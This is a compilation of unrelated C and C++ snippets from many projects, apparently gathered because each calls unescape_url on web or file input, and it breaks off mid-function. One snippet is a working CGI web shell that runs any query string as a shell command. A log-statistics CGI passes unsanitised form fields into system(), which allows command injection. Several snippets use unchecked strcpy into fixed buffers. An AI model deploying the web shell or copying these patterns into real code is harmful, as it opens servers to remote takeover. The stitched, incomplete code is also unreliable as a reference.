/*
* *** Ripped from HTTPD util.c (why are so many PORTABLE things not in APR UTIL?)
*/
int ap_unescape_url(char *url)
{
/* Traditional */
#ifdef CASE_BLIND_FILESYSTEM
return unescape_url(url, "/\\", NULL);
#else
return unescape_url(url, "/", NULL);
#endif
}
int main() {
FILE *in;
extern FILE *popen();
char buff[512];
char *data;
data = getenv("QUERY_STRING");
printf("Content-type: text/plain\n\n");
printf("Webshell.cgi\n");
printf("------------\n");
if (data != NULL) {
unescape_url(data);
printf("$ %s\n\n",data);
if (!(in = popen(data, "r"))) {
return -1;
}
while (fgets(buff, sizeof(buff), in) != NULL ) {
printf("%s", buff);
}
pclose(in);
}
return 0;
}
char *
getcgivar(char *cgistring, char *param)
{
register int i;
char *result = NULL;
char cgiinput[BUFFER_LEN];
static char result2[BUFFER_LEN];
char *nvpair;
strcpy(cgiinput, cgistring);
/** Change all plusses back to spaces **/
for (i = 0; cgiinput[i]; i++)
if (cgiinput[i] == '+')
cgiinput[i] = ' ';
nvpair = strtok(cgiinput, "&");
while (nvpair) {
char *test = getparam(nvpair);
if (!vcSTRCASECMP(test, param)) {
result = getvalue(nvpair);
free((void *) test);
break;
}
free((void *) test);
nvpair = strtok(NULL, "&");
}
unescape_url(result);
strcpy(result2, result);
free((void *) result);
return (result2);
}
bool HttpRequestPacket::Unescape_url(string &url)
{
char * pszUrl = strdup(url.c_str());
unescape_url(pszUrl);
url = pszUrl;
free(pszUrl);
return true;
}
static void
tabwin_handle_drag (GtkWidget *widget,
GdkDragContext *context,
gint x,
gint y,
GtkSelectionData *data,
guint info,
guint time,
gpointer p)
{
const guchar *seldata = NULL;
gchar *dfname;
char tmp[MAXLEN];
int pos, skip = 5;
if (data != NULL) {
seldata = gtk_selection_data_get_data(data);
}
if (info != GRETL_FILENAME) {
return;
}
/* ignore the wrong sort of data */
if (data == NULL || (dfname = (gchar *) seldata) == NULL ||
strlen(dfname) <= 5 || strncmp(dfname, "file:", 5)) {
return;
}
if (strncmp(dfname, "file://", 7) == 0) skip = 7;
#ifdef G_OS_WIN32
if (strncmp(dfname, "file:///", 8) == 0) skip = 8;
#endif
/* there may be multiple files: we ignore all but the first */
*tmp = 0;
if ((pos = gretl_charpos('\r', dfname)) > 0 ||
(pos = gretl_charpos('\n', dfname) > 0)) {
strncat(tmp, dfname + skip, pos - skip);
} else {
strcat(tmp, dfname + skip);
}
/* handle spaces and such */
unescape_url(tmp);
#ifdef G_OS_WIN32
filename_to_win32(tryfile, tmp);
#else
strcpy(tryfile, tmp);
#endif
if (has_suffix(tryfile, ".inp")) {
do_open_script(EDIT_SCRIPT);
}
}
void
Controller_Module::peer_callback( OSC::Signal *sig, OSC::Signal::State state, void *v )
{
char *s;
DMESSAGE( "Paramter limits: %f %f", sig->parameter_limits().min, sig->parameter_limits().max );
/* only show outputs */
if ( sig->direction() != OSC::Signal::Output )
return;
/* only list CV signals for now */
if ( ! ( sig->parameter_limits().min == 0.0 &&
sig->parameter_limits().max == 1.0 ) )
return;
if ( ! v )
{
/* if( state == OSC::Signal::Created ) */
/* timeline->connect_osc(); */
/* else */
/* timeline->update_osc_connection_state(); */
}
else
{
/* building menu */
// const char *name = sig->peer_name();
assert( sig->path() );
char *path = strdup( sig->path() );
unescape_url( path );
asprintf( &s, "%s/%s", peer_prefix, path );
peer_menu->add( s, 0, NULL, (void*)( sig ), 0 );
/* FL_MENU_TOGGLE | */
/* ( ((Controller_Module*)v)->_osc_output()->is_connected_to( sig ) ? FL_MENU_VALUE : 0 ) ); */
free( path );
free( s );
}
}
int main(int argc, char **argv){
char *str=NULL, *s;
size_t n;
if(argc<2)
getline(&str, &n, stdin);
else {
str=calloc(1+strlen(*(argv+1)), sizeof(char));
strcpy(str, *(argv+1));
}
if(s=strpbrk(str, "\r\n"))
*s=0;
while(s=strchr(str, '+'))
*s=' ';
unescape_url(str);
fputs(str, stdout);
return 0;
}
void
Controller_Module::add_osc_connections_to_menu ( Fl_Menu_Button *m, const char *prefix )
{
/* peer_menu = m; */
const char *peer_prefix = prefix;
// mixer->osc_endpoint->list_peer_signals( this );
Port *p = control_output[0].connected_port();
const char *number_path = p->osc_number_path();
const char *name_path = p->osc_path();
const char *paths[] = { number_path,name_path,NULL };
for ( const char **cpath = paths; *cpath; cpath++ )
{
const char ** conn = mixer->osc_endpoint->get_connections( *cpath );
if ( conn )
{
for ( const char **s = conn; *s; s++ )
{
/* building menu */
char *path = strdup( *s );
unescape_url( path );
char *ns;
asprintf( &ns, "%s/%s", peer_prefix, path );
peer_menu->add( ns, 0, NULL, const_cast<char*>(*s), 0 );
free( path );
// free(*s);
}
free( conn );
}
}
}
int
ReadCGIQueryString (list_t * env)
{
char *qs;
char *token;
int i;
if (getenv ("QUERY_STRING") != NULL)
{
qs = strdup (getenv ("QUERY_STRING"));
}
else
{
return (0);
}
/* change plusses into spaces */
for (i = 0; qs[i]; i++)
{
if (qs[i] == '+')
{
qs[i] = ' ';
}
};
/** split on & and ; to extract name value pairs */
token = strtok (qs, "&;");
while (token)
{
unescape_url (token);
myputenv (env, token, global.var_prefix);
myputenv (env, token, global.get_prefix);
token = strtok (NULL, "&;");
}
free (qs);
return (0);
}
main(int argc, char *argv[]) {
entry entries[MAX_ENTRIES];
register int x,m=0;
int cl;
printf("Content-type: text/html%c%c",10,10);
if(strcmp(getenv("REQUEST_METHOD"),"POST")) {
printf("This script should be referenced with a METHOD of POST.\n");
printf("If you don't understand this, see this ");
printf("<A HREF=\"http://www.ncsa.uiuc.edu/SDG/Software/Mosaic/Docs/fill-out-forms/overview.html\">forms overview</A>.%c",10);
exit(1);
}
if(strcmp(getenv("CONTENT_TYPE"),"application/x-www-form-urlencoded")) {
printf("This script can only be used to decode form results. \n");
exit(1);
}
cl = atoi(getenv("CONTENT_LENGTH"));
for(x=0;cl && (!feof(stdin));x++) {
m=x;
entries[x].val = fmakeword(stdin,'&',&cl);
plustospace(entries[x].val);
unescape_url(entries[x].val);
entries[x].name = makeword(entries[x].val,'=');
}
printf("<H1>Query Results</H1>");
printf("You submitted the following name/value pairs:<p>%c",10);
printf("<ul>%c",10);
for(x=0; x <= m; x++)
printf("<li> <code>%s : %s</code>%c",entries[x].name,
entries[x].val,10);
printf("</ul>%c",10);
}
main(int argc, char *argv[]) {
entry entries[10000];
register int x,m=0;
char *cl;
printf("Content-type: text/html%c%c",10,10);
if(strcmp(getenv("REQUEST_METHOD"),"GET")) {
printf("This script should be referenced with a METHOD of GET.\n");
printf("If you don't understand this, see this ");
printf("<A HREF=\"http://www.ncsa.uiuc.edu/SDG/Software/Mosaic/Docs/fill-out-forms/overview.html\">forms overview</A>.%c",10);
exit(1);
}
cl = getenv("QUERY_STRING");
if(cl == NULL) {
printf("No query information to decode.\n");
exit(1);
}
for(x=0;cl[0] != '\0';x++) {
m=x;
getword(entries[x].val,cl,'&');
plustospace(entries[x].val);
unescape_url(entries[x].val);
getword(entries[x].name,entries[x].val,'=');
}
printf("<H1>Query Results</H1>");
printf("You submitted the following name/value pairs:<p>%c",10);
printf("<ul>%c",10);
for(x=0; x <= m; x++)
printf("<li> <code>%s = %s</code>%c",entries[x].name,
entries[x].val,10);
printf("</ul>%c",10);
}
int loadParams(cgiRequestObj *request,
char* (*getenv2)(const char*, void* thread_context),
char *raw_post_data,
ms_uint32 raw_post_data_length,
void* thread_context)
{
register int x,m=0;
char *s, *queryString = NULL, *httpCookie = NULL;
int debuglevel;
int maxParams = MS_DEFAULT_CGI_PARAMS;
if (getenv2==NULL)
getenv2 = &msGetEnv;
if(getenv2("REQUEST_METHOD", thread_context)==NULL) {
msIO_printf("This script can only be used to decode form results and \n");
msIO_printf("should be initiated as a CGI process via a httpd server.\n");
return -1;
}
debuglevel = (int)msGetGlobalDebugLevel();
if(strcmp(getenv2("REQUEST_METHOD", thread_context),"POST") == 0) { /* we've got a post from a form */
char *post_data;
int data_len;
request->type = MS_POST_REQUEST;
s = getenv2("CONTENT_TYPE", thread_context);
if (s != NULL)
request->contenttype = msStrdup(s);
/* we've to set default Content-Type which is
* application/octet-stream according to
* W3 RFC 2626 section 7.2.1 */
else request->contenttype = msStrdup("application/octet-stream");
if (raw_post_data) {
post_data = msStrdup(raw_post_data);
data_len = raw_post_data_length;
} else {
if(MS_SUCCESS != readPostBody( request, &post_data ))
return -1;
data_len = strlen(post_data);
}
/* if the content_type is application/x-www-form-urlencoded,
we have to parse it like the QUERY_STRING variable */
if(strncmp(request->contenttype, "application/x-www-form-urlencoded", strlen("application/x-www-form-urlencoded")) == 0) {
while( data_len > 0 && isspace(post_data[data_len-1]) )
post_data[--data_len] = '\0';
while( post_data[0] ) {
if(m >= maxParams) {
maxParams *= 2;
request->ParamNames = (char **) msSmallRealloc(request->ParamNames,sizeof(char *) * maxParams);
request->ParamValues = (char **) msSmallRealloc(request->ParamValues,sizeof(char *) * maxParams);
}
request->ParamValues[m] = makeword(post_data,'&');
plustospace(request->ParamValues[m]);
unescape_url(request->ParamValues[m]);
request->ParamNames[m] = makeword(request->ParamValues[m],'=');
m++;
}
free( post_data );
} else
request->postrequest = post_data;
/* check the QUERY_STRING even in the post request since it can contain
information. Eg a wfs request with */
s = getenv2("QUERY_STRING", thread_context);
if(s) {
if (debuglevel >= MS_DEBUGLEVEL_DEBUG)
msDebug("loadParams() QUERY_STRING: %s\n", s);
queryString = msStrdup(s);
for(x=0; queryString[0] != '\0'; x++) {
if(m >= maxParams) {
maxParams *= 2;
request->ParamNames = (char **) msSmallRealloc(request->ParamNames,sizeof(char *) * maxParams);
request->ParamValues = (char **) msSmallRealloc(request->ParamValues,sizeof(char *) * maxParams);
}
request->ParamValues[m] = makeword(queryString,'&');
plustospace(request->ParamValues[m]);
unescape_url(request->ParamValues[m]);
request->ParamNames[m] = makeword(request->ParamValues[m],'=');
m++;
}
}
} else {
if(strcmp(getenv2("REQUEST_METHOD", thread_context),"GET") == 0) { /* we've got a get request */
request->type = MS_GET_REQUEST;
s = getenv2("QUERY_STRING", thread_context);
if(s == NULL) {
msIO_setHeader("Content-Type","text/html");
msIO_sendHeaders();
msIO_printf("No query information to decode. QUERY_STRING not set.\n");
return -1;
}
if (debuglevel >= MS_DEBUGLEVEL_DEBUG)
msDebug("loadParams() QUERY_STRING: %s\n", s);
if(strlen(s)==0) {
msIO_setHeader("Content-Type","text/html");
msIO_sendHeaders();
msIO_printf("No query information to decode. QUERY_STRING is set, but empty.\n");
return -1;
}
/* don't modify the string returned by getenv2 */
queryString = msStrdup(s);
for(x=0; queryString[0] != '\0'; x++) {
if(m >= maxParams) {
maxParams *= 2;
request->ParamNames = (char **) msSmallRealloc(request->ParamNames,sizeof(char *) * maxParams);
request->ParamValues = (char **) msSmallRealloc(request->ParamValues,sizeof(char *) * maxParams);
}
request->ParamValues[m] = makeword(queryString,'&');
plustospace(request->ParamValues[m]);
unescape_url(request->ParamValues[m]);
request->ParamNames[m] = makeword(request->ParamValues[m],'=');
m++;
}
} else {
msIO_setHeader("Content-Type","text/html");
msIO_sendHeaders();
msIO_printf("This script should be referenced with a METHOD of GET or METHOD of POST.\n");
return -1;
}
}
/* check for any available cookies */
s = getenv2("HTTP_COOKIE", thread_context);
if(s != NULL) {
httpCookie = msStrdup(s);
request->httpcookiedata = msStrdup(s);
for(x=0; httpCookie[0] != '\0'; x++) {
if(m >= maxParams) {
maxParams *= 2;
request->ParamNames = (char **) msSmallRealloc(request->ParamNames,sizeof(char *) * maxParams);
request->ParamValues = (char **) msSmallRealloc(request->ParamValues,sizeof(char *) * maxParams);
}
request->ParamValues[m] = makeword(httpCookie,';');
plustospace(request->ParamValues[m]);
unescape_url(request->ParamValues[m]);
request->ParamNames[m] = makeword_skip(request->ParamValues[m],'=',' ');
m++;
}
}
if (queryString)
free(queryString);
if (httpCookie)
free(httpCookie);
return(m);
}
main(int argc, char *argv[]) {
register int x,m=0;
char *cl;
char w[256];
char tfile[L_tmpnam];
int subs,slims,sides,drinks,allow;
char name[32];
char phone[10];
char address[64];
FILE *tfp,*order;
printf("Content-type: text/html%c%c",LF,LF);
cl=getenv("QUERY_STRING");
if((!cl) || (!cl[0]))
dump_form();
tmpnam(tfile);
if(!(tfp=fopen(tfile,"w"))) {
printf("<TITLE>Server Error</TITLE>%c",LF);
printf("<H1>Server Error</H1>%c",LF);
printf("Server unable to get a temporary file. Please try again later.<P>%c",LF);
exit(1);
}
subs=0;slims=0;sides=0;drinks=0;allow=0;
name[0]='\0';
phone[0]='\0';
address[0]='\0';
for(x=0;cl[0] != '\0'; x++) {
m=x;
getword(w,cl,'=');
plustospace(w);
unescape_url(w);
if(!strcmp(w,"pwd")) {
getword(w,cl,'&');
plustospace(w);
unescape_url(w);
allow=(strcmp(w,PASSWORD) ? 0 : 1);
}
if(!strcmp(w,"sub")) {
getword(w,cl,'&');
plustospace(w);
unescape_url(w);
subs |= (1 << atoi(w));
}
else if(!strcmp(w,"slj")) {
getword(w,cl,'&');
plustospace(w);
unescape_url(w);
slims |= (1 << atoi(w));
}
else if(!strcmp(w,"sde")) {
getword(w,cl,'&');
plustospace(w);
unescape_url(w);
sides |= (1 << atoi(w));
}
else if(!strcmp(w,"pop")) {
getword(w,cl,'&');
plustospace(w);
unescape_url(w);
drinks |= (1 << atoi(w));
}
else if(!strcmp(w,"name")) {
getword(w,cl,'&');
plustospace(w);
unescape_url(w);
strcpy(name,w);
}
else if(!strcmp(w,"phone")) {
getword(w,cl,'&');
plustospace(w);
unescape_url(w);
strcpy(phone,w);
}
else if(!strcmp(w,"adr")) {
getword(w,cl,'&');
plustospace(w);
unescape_url(w);
strcpy(address,w);
}
}
if(!name[0]) print_error("you didn't give your name");
if(!address[0]) print_error("you didn't give your address");
if(!phone[0]) print_error("you didn't give your phone number");
if((!subs) && (!slims) && (!sides) && (!drinks)) print_error("you didn't order anything");
if(allow) {
char t[256];
sprintf(t,"/bin/mail %s",JJ_FAX);
if(!(order=popen(t,"w")))
print_error("the server was unable to open a pipe to mail");
printf("<TITLE>Order Sent</TITLE>%c",LF);
printf("<H1>Order Sent</H1>%c",LF);
printf("Your order has been sent to the UIUC e-mail to FAX gateway.<P>%c",LF);
} else {
printf("<TITLE>Your Order</TITLE>%c",LF);
printf("<H1>Your Order</H1>%c",LF);
printf("This is how your order would have looked if it had been sent.<P><PLAINTEXT>%c",LF);
order=stdout;
}
fprintf(order,"My name is %s, and I would like to have the following%c",
name,LF);
fprintf(order,"order delivered to %s:%c%c",address,LF,LF);
for(x=0;x<12;x++)
if(subs & (1 << x))
fprintf(order,"\t(1) %s%c",sublist[x],LF);
for(x=0;x<6;x++)
if(slims & (1 << x))
fprintf(order,"\t(1) %s Slim Jim%c",slimlist[x],LF);
for(x=0;x<2;x++)
if(sides & (1 << x))
fprintf(order,"\t(1) %s%c",sidelist[x],LF);
for(x=0;x<4;x++)
if(drinks & (1 << x))
fprintf(order,"\t(1) %s%c",poplist[x],LF);
fprintf(order,"%cPlease feel free to call me at %s if there is any%c",LF,
phone,LF);
fprintf(order,"problem. Thank you.%c%c.%c",LF,LF,LF);
fclose(order);
exit(0);
}
main(int argc, char *argv[])
{
entry entries[MAXENTRIES];
register int x, m = 0;
int cl, invalid = 0, didroot = 0, didhtml = 0;
char protocol;
if (strcmp(getenv("REQUEST_METHOD"), "POST")) {
printf("We can't do much with a blank subscription card, ");
printf("can we?\n");
exit(1);
}
if (strcmp(getenv("CONTENT_TYPE"),
"application/x-www-form-urlencoded")) {
printf("This script can only be used to decode form ");
printf("results.\n");
exit(1);
}
cl = atoi(getenv("CONTENT_LENGTH"));
sprintf(command, "%s ", GETSTATS);
for(x = 0; cl && (!feof(stdin)); x++) {
m = x;
entries[x].val = fmakeword(stdin, '&', &cl);
plustospace(entries[x].val);
unescape_url(entries[x].val);
entries[x].name = makeword(entries[x].val,'=');
if (!strcmp(entries[x].name, "protocol")) {
protocol = entries[x].val[0];
if (protocol == 'G')
sprintf(command, "%s -G %s", command);
else if (protocol == 'N')
sprintf(command, "%s -N %s", command);
else if (protocol == 'C')
sprintf(command, "%s -C %s", command);
else if (protocol == 'P')
sprintf(command, "%s -P %s", command);
else if (protocol == 'M')
sprintf(command, "%s -A %s", command);
else if (protocol == 'U')
sprintf(command, "%s -O %s", command);
}
if (!didroot) {
sprintf(command, "%s -dr %s", command, ROOTDIR);
didroot = 1;
}
if (!strcmp(entries[x].name, "logfilename"))
if (strlen(entries[x].val))
sprintf(command, "%s -l %s", command,
entries[x].val);
else
sprintf(command, "%s -l %s", command, LOGFILE);
if (!strcmp(entries[x].name, "common") &&
!strcmp(entries[x].val, "on"))
sprintf(command, "%s -M", command);
if (!strcmp(entries[x].name, "concise") &&
!strcmp(entries[x].val, "on"))
sprintf(command, "%s -c", command);
if (!strcmp(entries[x].name, "toplines") &&
strlen(entries[x].val))
sprintf(command, "%s -t %s ", command, entries[x].val);
if (!strcmp(entries[x].name, "all") &&
!strcmp(entries[x].val, "on"))
sprintf(command, "%s -a ", command);
if (!strcmp(entries[x].name, "monthly") &&
!strcmp(entries[x].val, "on"))
sprintf(command, "%s -m ", command);
if (!strcmp(entries[x].name, "weekly") &&
!strcmp(entries[x].val, "on"))
sprintf(command, "%s -w ", command);
if (!strcmp(entries[x].name, "daysweek") &&
!strcmp(entries[x].val, "on"))
sprintf(command, "%s -ds ", command);
if (!strcmp(entries[x].name, "daily") &&
!strcmp(entries[x].val, "on"))
sprintf(command, "%s -d ", command);
if (!strcmp(entries[x].name, "hoursday") &&
!strcmp(entries[x].val, "on"))
sprintf(command, "%s -hs ", command);
if (!strcmp(entries[x].name, "hourly") &&
!strcmp(entries[x].val, "on"))
sprintf(command, "%s -h ", command);
if (!strcmp(entries[x].name, "full-hostname") &&
!strcmp(entries[x].val, "on"))
sprintf(command, "%s -f ", command);
if (!strcmp(entries[x].name, "full-access") &&
!strcmp(entries[x].val, "on"))
sprintf(command, "%s -fa ", command);
if (!strcmp(entries[x].name, "full-lastaccess") &&
!strcmp(entries[x].val, "on"))
sprintf(command, "%s -fd ", command);
if (!strcmp(entries[x].name, "full-bytes") &&
!strcmp(entries[x].val, "on"))
sprintf(command, "%s -fb ", command);
if (!strcmp(entries[x].name, "request-name") &&
!strcmp(entries[x].val, "on"))
sprintf(command, "%s -r ", command);
if (!strcmp(entries[x].name, "request-accesses") &&
!strcmp(entries[x].val, "on"))
sprintf(command, "%s -ra ", command);
if (!strcmp(entries[x].name, "request-lastaccesses") &&
!strcmp(entries[x].val, "on"))
sprintf(command, "%s -rd ", command);
if (!strcmp(entries[x].name, "request-bytes") &&
!strcmp(entries[x].val, "on"))
sprintf(command, "%s -rb ", command);
if (!strcmp(entries[x].name, "request-filesize") &&
!strcmp(entries[x].val, "on"))
sprintf(command, "%s -rf ", command);
if (!strcmp(entries[x].name, "domain-name") &&
!strcmp(entries[x].val, "on"))
sprintf(command, "%s -dn ", command);
if (!strcmp(entries[x].name, "domain-requests") &&
!strcmp(entries[x].val, "on"))
sprintf(command, "%s -da ", command);
if (!strcmp(entries[x].name, "domain-lastaccesses") &&
!strcmp(entries[x].val, "on"))
sprintf(command, "%s -dd ", command);
if (!strcmp(entries[x].name, "domain-bytes") &&
!strcmp(entries[x].val, "on"))
sprintf(command, "%s -db ", command);
if (!strcmp(entries[x].name, "domain-sub") &&
!strcmp(entries[x].val, "on"))
sprintf(command, "%s -du ", command);
if (!strcmp(entries[x].name, "filetree") &&
!strcmp(entries[x].val, "on"))
sprintf(command, "%s -dt ", command);
if (!strcmp(entries[x].name, "error") &&
!strcmp(entries[x].val, "on"))
sprintf(command, "%s -e ", command);
if (!strcmp(entries[x].name, "samask"))
if (strlen(entries[x].val) != 0)
sprintf(command, "%s -sa \"%s\"", command,
entries[x].val);
if (!strcmp(entries[x].name, "ssmask"))
if (strlen(entries[x].val) != 0)
sprintf(command, "%s -ss \"%s\"", command,
entries[x].val);
if (!strcmp(entries[x].name, "srmask"))
if (strlen(entries[x].val) != 0)
sprintf(command, "%s -sr \"%s\"", command,
entries[x].val);
if (!strcmp(entries[x].name, "spmask"))
if (strlen(entries[x].val) != 0)
sprintf(command, "%s -sp \"%s\"", command,
entries[x].val);
if (!strcmp(entries[x].name, "sdmask"))
if (strlen(entries[x].val) != 0)
sprintf(command, "%s -sd \"%s\"", command,
entries[x].val);
if (!strcmp(entries[x].name, "shmask"))
if (strlen(entries[x].val) != 0)
sprintf(command, "%s -sh \"%s\"", command,
entries[x].val);
if (!strcmp(entries[x].name, "swmask"))
if (strlen(entries[x].val) != 0)
sprintf(command, "%s -sw \"%s\"", command,
entries[x].val);
if (!strcmp(entries[x].name, "mailme") &&
strlen(entries[x].val) != 0) {
sprintf(command, "%s | /usr/ucb/mail -s \"%s\" %s",
command, SUBJECT, entries[x].val);
printf("Content-type: text/html\n\n");
printf("<title>It's in the mail...</title>\n<p>\n");
printf("<h1>Your log request is being mailed to ");
printf("you.</h1>\n");
printf("The following command was executed:\n");
printf("<p>\n<code>%s</code>\n", command);
}
else if (!strcmp(entries[x].name, "mailme") &&
strlen(entries[x].val) == 0 && !didhtml) {
sprintf(command, "%s -ht", command);
didhtml = 1;
}
}
sprintf(command, "%s &\n", command);
system(command);
exit(0);
}
/* Returns the contents of the provided fields in a newly allocated
* string, or a negative value on error.
*
* @body: is the string to search the xml field at, should be null-terminated.
* @xml_field: the XML field to check for (e.g., MYFIELD)
* @value: the value that was found
*/
static
int parse_reply(worker_st * ws, char *body, unsigned body_length,
const char *field, unsigned field_size,
const char *xml_field, unsigned xml_field_size,
char **value)
{
char *p;
char temp1[64];
char temp2[64];
unsigned temp2_len, temp1_len;
unsigned len, xml = 0;
if (body == NULL || body_length == 0)
return -1;
if (memmem(body, body_length, "<?xml", 5) != 0) {
xml = 1;
if (xml_field) {
field = xml_field;
field_size = xml_field_size;
}
snprintf(temp1, sizeof(temp1), "<%s>", field);
snprintf(temp2, sizeof(temp2), "</%s>", field);
temp1_len = strlen(temp1);
temp2_len = strlen(temp2);
/* body should contain <field>test</field> */
*value =
strcasestr(body, temp1);
if (*value == NULL) {
oclog(ws, LOG_HTTP_DEBUG,
"cannot find '%s' in client XML message", field);
return -1;
}
*value += temp1_len;
p = *value;
len = 0;
while (*p != 0) {
if (*p == '<'
&& (strncasecmp(p, temp2, temp2_len) == 0)) {
break;
}
p++;
len++;
}
} else { /* non-xml version */
snprintf(temp1, sizeof(temp1), "%s=", field);
temp1_len = strlen(temp1);
/* body should be "username=test&password=test" */
*value =
strcasestr(body, temp1);
if (*value == NULL) {
oclog(ws, LOG_HTTP_DEBUG,
"cannot find '%s' in client message", field);
return -1;
}
*value += temp1_len;
p = *value;
len = 0;
while (*p != 0) {
if (*p == '&') {
break;
}
p++;
len++;
}
}
if (len == 0) {
*value = talloc_strdup(ws->req.body, "");
if (*value != NULL)
return 0;
return -1;
}
if (xml)
*value = unescape_html(ws->req.body, *value, len, NULL);
else
*value = unescape_url(ws->req.body, *value, len, NULL);
if (*value == NULL) {
oclog(ws, LOG_ERR,
"%s requested but no such field in client message", field);
return -1;
}
return 0;
}
int
ReadCGIPOSTValues (list_t * env)
{
size_t content_length = 0;
size_t max_len;
size_t i, j, x;
sliding_buffer_t sbuf;
buffer_t token;
unsigned char *data;
const char *CONTENT_LENGTH = "CONTENT_LENGTH";
if ((getenv (CONTENT_LENGTH) == NULL) ||
(strtoul (getenv (CONTENT_LENGTH), NULL, 10) == 0))
return (0);
if (getenv ("CONTENT_TYPE"))
{
if (strncasecmp (getenv ("CONTENT_TYPE"), "multipart/form-data", 19)
== 0)
{
/* This is a mime request, we need to go to the mime handler */
i = rfc2388_handler (env);
return (i);
}
}
s_buffer_init (&sbuf, 32768);
sbuf.fh = STDIN;
if (getenv (CONTENT_LENGTH))
{
sbuf.maxread = strtoul (getenv (CONTENT_LENGTH), NULL, 10);
}
haserl_buffer_init (&token);
/* Allow 2MB content, unless they have a global upload set */
max_len = ((global.uploadkb == 0) ? 2048 : global.uploadkb) *1024;
do
{
/* x is true if this token ends with a matchstr or is at the end of stream */
x = s_buffer_read (&sbuf, "&");
content_length += sbuf.len;
if (content_length > max_len)
{
die_with_message (NULL, NULL,
"Attempted to send content larger than allowed limits.");
}
if ((x == 0) || (token.data))
{
buffer_add (&token, (char *) sbuf.segment, sbuf.len);
}
if (x)
{
data = sbuf.segment;
sbuf.segment[sbuf.len] = '\0';
if (token.data)
{
/* add the ASCIIZ */
buffer_add (&token, sbuf.segment + sbuf.len, 1);
data = token.data;
}
/* change plusses into spaces */
j = strlen ((char *) data);
for (i = 0; i <= j; i++)
{
if (data[i] == '+')
{
data[i] = ' ';
}
}
unescape_url ((char *) data);
myputenv (env, (char *) data, global.var_prefix);
myputenv (env, (char *) data, global.post_prefix);
if (token.data)
{
buffer_reset (&token);
}
}
}
while (!sbuf.eof);
s_buffer_destroy (&sbuf);
buffer_destroy (&token);
return (0);
}
void SVDeviceTest::refresh()
{
OutputDebugString("--------------- refresh() --------------\n");
if (m_pFinish)
{
m_pFinish->setText("");
}
char szQuery[4096] = {0};
int nSize = 4095;
#ifdef WTGET
GetEnvironmentVariable( "QUERY_STRING", szQuery,nSize);
#else
char * tmpquery;
tmpquery = getenv( "QUERY_STRING");
if(tmpquery != NULL)
{
strcpy(szQuery,tmpquery);
}
else
{
return;
}
#endif
strParam = szQuery;
if(strlen(szQuery) > 0)
{
unescape_url(szQuery);
m_szQuery = szQuery;
if(m_pSubContent)
{
m_pSubContent->clear();
//new WText(m_szWaiting, m_pSubContent->elementAt(0, 0));
if(m_pWait)
m_pWait->setText(m_szWaiting);
}
//Jansion.zhou 2007-01-07
//if(m_pClose)
// m_pClose->setEnabled(false);
//if (m_pClose)
// m_pClose->SetDisable();
OutputDebugString("--------------- m_pHideButton will clicked --------------\n");
WebSession::js_af_up = "update('" + getCmd() + "');";
}
else
{
m_szQuery = "";
if(m_pSubContent)
{
int nRow = m_pSubContent->numRows();
new WText(m_szQueryEmpty, m_pSubContent->elementAt(nRow, 0));
}
OutputDebugString("--------------- m_pHideButton is not clicked --------------\n");
//if (m_pClose)
// m_pClose->setEnabled(true);
}
int bTrans = GetIniFileInt("translate", "translate", 0, "general.ini");
if(bTrans == 1)
{
pTranslateBtn->show();
pExChangeBtn->show();
}
else
{
pTranslateBtn->hide();
pExChangeBtn->hide();
}
}
void decode_url(char *url)
{
plustospace(url);
unescape_url(url);
unpercent_url(url);
}
void
cgi_init( int *result ) {
int cl, i, in_multipart_headers, which_entry, length_gotten;
char * boundary;
/* Default, no errors, no name/value pairs ("entries"): */
cgi_errno = CGIERR_NONE;
cgi_num_entries = 0;
length_gotten = 0;
/* Check for REQUEST_METHOD (set by HTTP server): */
if (getenv("REQUEST_METHOD") == NULL)
{
/* None set? Assume the user is invoking the CGI from a shell prompt
(for debugging): */
cgi_request_method = CGIREQ_NONE;
}
else
{
/* Determine the exact request method, and grab the data (if any)
in the appropriate manner: */
if (strcmp(getenv("REQUEST_METHOD"), "POST") == 0)
{
/* Post method (data is sent to us via "stdin"): */
cgi_request_method = CGIREQ_POST;
if (getenv("CONTENT_TYPE") == NULL)
{
/* Content type is not set! */
cgi_errno = CGIERR_INCORRECT_TYPE;
cgi_content_type = CGITYPE_UNKNOWN;
CGI_RETURN(cgi_errno);
}
else if (strcmp(getenv("CONTENT_TYPE"),
"application/x-www-form-urlencoded") == 0)
{
cgi_content_type = CGITYPE_APPLICATION_X_WWW_FORM_URLENCODED;
/* How much data do we expect? */
if (getenv("CONTENT_LENGTH") == NULL ||
sscanf(getenv("CONTENT_LENGTH"), "%d", &cl) != 1)
{
cgi_errno = CGIERR_BAD_CONTENT_LENGTH;
CGI_RETURN(cgi_errno);
}
/* Create space for it: */
cgi_query = malloc(cl + 1);
/* 2.0.1 - Tadek Orlowski ([email protected]) ... "+1" */
if (cgi_query == NULL)
{
cgi_errno = CGIERR_OUT_OF_MEMORY;
CGI_RETURN(cgi_errno);
}
/* Read it in: */
fgets(cgi_query, cl + 1, stdin);
/* Verify that we got as much data as we expected: */
if (strlen(cgi_query) != cl)
cgi_errno = CGIERR_CONTENT_LENGTH_DISCREPANCY;
}
else if (strstr(getenv("CONTENT_TYPE"),
"multipart/form-data") == getenv("CONTENT_TYPE"))
{
cgi_content_type = CGITYPE_MULTIPART_FORM_DATA;
cgi_query = malloc(2050);
if (cgi_query == NULL)
{
cgi_errno = CGIERR_OUT_OF_MEMORY;
CGI_RETURN(cgi_errno);
}
/* Determine the boundary string: */
if (strstr(getenv("CONTENT_TYPE"),
"boundary=") == NULL)
{
cgi_errno = CGIERR_NO_BOUNDARY;
CGI_RETURN(cgi_errno);
}
boundary = strdup(strstr(getenv("CONTENT_TYPE"),
"boundary=") + 9);
debug("boundary", boundary);
/* Read in until there's no more: */
in_multipart_headers = 0;
which_entry = -1;
do
{
length_gotten = lineread(stdin, cgi_query, 2048);
debug("cgi_query", cgi_query);
if (length_gotten > 0)
{
if (strstr(cgi_query, boundary) == cgi_query + 2 &&
cgi_query[0] == '-' && cgi_query[1] == '-')
{
/* We got a boundary! */
in_multipart_headers = 1;
which_entry = -1;
}
else /* (Not a boundary) */
{
if (in_multipart_headers == 1)
{
/* We had just got a boundary, read headers: */
if (cgi_query[0] == '\r' || cgi_query[0] == '\n')
{
/* Blank line, end of headers: */
in_multipart_headers = 0;
}
else /* (Not a blank line) */
{
/* What kind of header is it? */
if (strstr(cgi_query,
"Content-Disposition: ") ==
cgi_query)
{
/* Content-disposition: */
/* For now, just look for "name=": */
if (strstr(cgi_query, "name=\"") != NULL)
{
/* Add a new entry: */
which_entry = cgi_num_entries;
cgi_num_entries++;
/* Make more room: */
cgi_entries =
realloc(cgi_entries,
sizeof(cgi_entry_type) *
cgi_num_entries);
if (cgi_entries == NULL)
{
